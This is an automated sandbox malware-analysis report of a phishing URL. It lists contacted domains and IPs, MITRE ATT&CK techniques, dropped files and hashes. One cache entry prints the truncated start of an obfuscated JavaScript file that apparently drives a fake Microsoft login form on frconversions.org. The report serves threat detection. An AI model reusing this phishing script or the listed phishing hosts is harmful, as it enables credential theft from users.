Source: Yara match	File source: 4.9.pages.csv, type: HTML
Source: Yara match	File source: 4.9.pages.csv, type: HTML
Source: Yara match	File source: 4.11.pages.csv, type: HTML
Source: Yara match	File source: 3.7.pages.csv, type: HTML
Source: Yara match	File source: 3.7.pages.csv, type: HTML
Source: Yara match	File source: 4.13.pages.csv, type: HTML
Source: Yara match	File source: 4.9.pages.csv, type: HTML
Source: Yara match	File source: 4.11.pages.csv, type: HTML

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://mmis.framer.website/	0%	Avira URL Cloud	safe
https://mmis.framer.website/	0%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
framerusercontent.com	0%	Virustotal		Browse

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
framerusercontent.com	65.8.178.27	true	false	0%, Virustotal, Browse	unknown
a.nel.cloudflare.com	35.190.80.1	true	false		high
events.framer.com	108.157.173.46	true	false		high
mmis.framer.website	52.4.138.82	true	false		unknown
frconversions.org	172.67.143.52	true	false		unknown
challenges.cloudflare.com	104.17.3.184	true	false		high
www.google.com	142.250.189.132	true	false		high

Contacted URLs

Name	Malicious	Reputation
https://mmis.framer.website/	false	unknown
https://frconversions.org/	false	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/5kzn4/0x4AAAAAAADnPIDROrmt1Wwj/light/normal	false	high
https://frconversions.org/b192fd32d7aea0eeba98125bbecf56db660cf4a85ea89LOGb192fd32d7aea0eeba98125bbecf56db660cf4a85ea8a	true	unknown
https://frconversions.org/b192fd32d7aea0eeba98125bbecf56db660cf4a85ea89LOGb192fd32d7aea0eeba98125bbecf56db660cf4a85ea8a#	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.189.142	unknown	United States	15169	GOOGLEUS	false
142.250.189.131	unknown	United States	15169	GOOGLEUS	false
52.4.138.82	mmis.framer.website	United States	14618	AMAZON-AESUS	false
192.178.50.67	unknown	United States	15169	GOOGLEUS	false
192.178.50.78	unknown	United States	15169	GOOGLEUS	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
65.8.178.52	unknown	United States	16509	AMAZON-02US	false
192.178.50.46	unknown	United States	15169	GOOGLEUS	false
172.217.2.195	unknown	United States	15169	GOOGLEUS	false
142.250.189.132	www.google.com	United States	15169	GOOGLEUS	false
172.217.204.84	unknown	United States	15169	GOOGLEUS	false
142.250.189.136	unknown	United States	15169	GOOGLEUS	false
104.17.3.184	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
108.157.173.8	unknown	United States	16509	AMAZON-02US	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.217.234	unknown	United States	15169	GOOGLEUS	false
172.67.143.52	frconversions.org	United States	13335	CLOUDFLARENETUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
65.8.178.27	framerusercontent.com	United States	16509	AMAZON-02US	false
108.157.173.46	events.framer.com	United States	16509	AMAZON-02US	false
104.21.39.45	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1419163
Start date and time:	2024-04-03 08:17:29 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://mmis.framer.website/
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.phis.troj.win@22/36@26/227

Warnings

Exclude process from analysis (whitelisted): svchost.exe
Excluded IPs from analysis (whitelisted): 192.178.50.67, 192.178.50.78, 172.217.204.84, 172.217.2.195, 34.104.35.123, 142.250.189.136, 142.250.189.142
Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, fonts.gstatic.com, www.googletagmanager.com, clientservices.googleapis.com, clients.l.google.com, www.google-analytics.com
Not all processes where analyzed, report is missing behavior information

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Apr 3 05:18:00 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.980042553184811
Encrypted:	false
SSDEEP:
MD5:	FD9BC133A00FAFD16D0F2838E0908A10
SHA1:	469908444098822FB88E1D200B0D341DCB2446CD
SHA-256:	C038468C68E55C4CFB2CD5BF9DBBA3B6DFD13805571A11E5321691FA429B1168
SHA-512:	9743CEBA7AA904EAE904511065BC95D58FB888C19E345BD24B187E597C86D912FA5E8859AB62B6809418A612FF7D0EAF72BDADB0E250DE9C044A512BA41BC04B
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....g.......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X52....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X=2....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X=2....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X=2..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XA2...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........hW.P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Apr 3 05:18:00 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	3.9964641983378946
Encrypted:	false
SSDEEP:
MD5:	D1A5285C25BCECEA4D828B78E3CD0C3B
SHA1:	465F21F48D531F12DEB7E8B272041558464E7360
SHA-256:	216D4F4FA55A4B43827E57424AC36CB7CEA777E9B4E71109FD5571E38D05BB8A
SHA-512:	D37EBA0A30B5DA3B6813145EA0B2EFC44A2A053F0C931F4CA44024E042EDBB06C8E42C48F2875D7FBEABE49D4353FA45887DED8E8FBEC0320BBF37BB6E7CF7E4
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....9.......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X52....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X=2....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X=2....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X=2..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XA2...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........hW.P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.004233489175851
Encrypted:	false
SSDEEP:
MD5:	968F1B31C321E0076779350CBCEC9596
SHA1:	82D7B28CDB804C620FCD9160A5CA49A7DD5D9A3E
SHA-256:	6946B338C500C932E2C9CD4463306D9AF0903372CC440F11BBC4B7FF22626BB7
SHA-512:	025E3F9EE16018F000330B63F2C6D0092AFF20874FB577D4899E1F16978DC00EC616137E25C764FAF331C1839BD7493DBC1DEDE7A07B711032D4ACF9F45EC36C
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X52....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X=2....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X=2....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X=2..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........hW.P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Apr 3 05:18:00 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.996399609927446
Encrypted:	false
SSDEEP:
MD5:	685B174BE2B207BF1C079D0B5CAFDDF5
SHA1:	1C9552081C63C6CE8F5ABFC5BCC1625C6DA5663D
SHA-256:	5DC634DA89FAD9E71B77BB80192A75AE4EAB73E37BE4913708B5FE3C3EDA481B
SHA-512:	16A227B72A5D158340C480D0C09D654D3B003FBB841CCFA180E6BF3CC2918581360025A1165D5FCB1A68591696C19C5B3AE40D2BE4E7C29996FCA21A06926D8D
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....?.......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X52....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X=2....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X=2....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X=2..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XA2...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........hW.P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Apr 3 05:18:00 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.981098897726476
Encrypted:	false
SSDEEP:
MD5:	6CA20A3785B6F3E5B3F2200A9BAA431E
SHA1:	09140EBADC7731229142AAC745A500EC9AB08885
SHA-256:	B93F63934408359FB1607432893B866F16A4690328E90271C669EB5EE5B4EC9F
SHA-512:	A6EA40E9E36EE6CFDBA0C57F413F2651A16FDF5AF9643AF8578FA345098AE25E02A5177183621952616E5613AEF74A69D91B316307073E6ABCCE5AB9AA718E62
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....th......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X52....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X=2....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X=2....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X=2..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XA2...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........hW.P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Apr 3 05:18:00 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9953821067437087
Encrypted:	false
SSDEEP:
MD5:	8441F403BDFE5FD572DD60B7E5E3D29E
SHA1:	65EC34EB844E8C91AFE7619CAB365D81085AA746
SHA-256:	B2D664248D18D70583C3F779E5D4A851CD513CFB2FDCB245EBD111AC7C495DBB
SHA-512:	877B22BEDFA19D375D34F92ACD85BD4414380C5799318D7FC3C0CCC5E60BFF0DB8303176839410E84B95BAAA7BBE8311E6BB4BA6695296C30A8A116F51012651
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X52....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X=2....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X=2....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X=2..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XA2...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........hW.P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 101

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.875
Encrypted:	false
SSDEEP:
MD5:	011B17B116126E6E0C4A9B0DE9145805
SHA1:	DF63A6EB731FFCE96F79802EFF6D53D00CDA42BC
SHA-256:	3418E6E704387A99F1611EB7BB883328A438BA600971E6D692E8BEA60F10B179
SHA-512:	BB432E96AF588E0B19CBD8BC228C87989FE578167FD1F3831C7E50D2D86DE11016FB93679FEF189B39085E9151EB9A6EB2986155C65DD0FE95EC85454D32AE7D
Malicious:	false
Reputation:	unknown
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkvTXNRwgG5VxIFDdFbUVI=?alt=proto
Preview:	CgkKBw3RW1FSGgA=

Chrome Cache Entry: 102

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	61
Entropy (8bit):	3.990210155325004
Encrypted:	false
SSDEEP:
MD5:	9246CCA8FC3C00F50035F28E9F6B7F7D
SHA1:	3AA538440F70873B574F40CD793060F53EC17A5D
SHA-256:	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
SHA-512:	A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 104

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	3651
Entropy (8bit):	4.094801914706141
Encrypted:	false
SSDEEP:
MD5:	EE5C8D9FB6248C938FD0DC19370E90BD
SHA1:	D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256:	04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512:	C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious:	false
Reputation:	unknown
URL:	https://frconversions.org/ASSETS/img/m_.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

Chrome Cache Entry: 105

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (7043), with no line terminators
Category:	downloaded
Size (bytes):	7043
Entropy (8bit):	5.2804407743048944
Encrypted:	false
SSDEEP:
MD5:	B6C202188699B897BB727A68EDD24665
SHA1:	FF3B891E06C983DCA277C1D7D874C8EB8084EB96
SHA-256:	184A034CB9202937BF012AFF8C81E0747B7CA8F8F9E6115556FDB09D5BAEC419
SHA-512:	AD8D243B156841EC27CA057CF1E0F64B8802E0DF64F79000739605CDE2C9A9FA1E3E24D153AB34A7AA66F726FC701816CA116052F4129AF3FB78D8F4057EE9F8
Malicious:	false
Reputation:	unknown
URL:	https://frconversions.org/js/7d0f96ff9ef6b58952bc095b438596c6660cf4a9221fa
Preview:	var _0x22d5b4=_0xe936;function _0xe936(_0x110d0f,_0x2b91a9){var _0x5afc29=_0x2e89();return _0xe936=function(_0x5e8034,_0x1649af){_0x5e8034=_0x5e8034-0x12d;var _0x41bfe8=_0x5afc29[_0x5e8034];return _0x41bfe8;},_0xe936(_0x110d0f,_0x2b91a9);}(function(_0x18f255,_0x432ca9){var _0xb8cc2=_0xe936,_0x553352=_0x18f255();while(!![]){try{var _0x1c3eea=-parseInt(_0xb8cc2(0x161))/0x1+-parseInt(_0xb8cc2(0x132))/0x2+parseInt(_0xb8cc2(0x154))/0x3+-parseInt(_0xb8cc2(0x16c))/0x4+parseInt(_0xb8cc2(0x12e))/0x5+parseInt(_0xb8cc2(0x174))/0x6+-parseInt(_0xb8cc2(0x136))/0x7;if(_0x1c3eea===_0x432ca9)break;else _0x553352['push'](_0x553352['shift']());}catch(_0x104ec1){_0x553352['push'](_0x553352['shift']());}}}(_0x2e89,0x62b01));function _0x2e89(){var _0x35743b=['log','under','prototype','usernameError','disabled','search','progressBar','removeClass','<br/>','each','json','trace','style','querySelector','opacity','none','i0116','value','location','removeAttr','reset','log_form','now','redirect','reload','.light

Chrome Cache Entry: 107

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	105369
Entropy (8bit):	5.240719144154261
Encrypted:	false
SSDEEP:
MD5:	8E6B0F88563F9C33F78BCE65CF287DF7
SHA1:	EF7765CD2A7D64ED27DD7344702597AFF6F8C397
SHA-256:	A7057BEBFFF43E7281CA31DA00D40BD88C8D02D1576B9C45891DD56A3853269A
SHA-512:	7DCE31D45ACA40340490B9F437A22ADF212B049DE0D4DDEB908A50C1F5C6C7B5561323B3A93B6ED3E5A7C44D7170460BFF8D8722749191C0F5A8DBD83E093E7F
Malicious:	false
Reputation:	unknown
URL:	https://frconversions.org/APP-7d0f96ff9ef6b58952bc095b438596c6660cf4ab00856/7d0f96ff9ef6b58952bc095b438596c6660cf4ab00857
Preview:	html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}

Chrome Cache Entry: 109

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1864
Entropy (8bit):	5.222032823730197
Encrypted:	false
SSDEEP:
MD5:	BC3D32A696895F78C19DF6C717586A5D
SHA1:	9191CB156A30A3ED79C44C0A16C95159E8FF689D
SHA-256:	0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
SHA-512:	8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
Malicious:	false
Reputation:	unknown
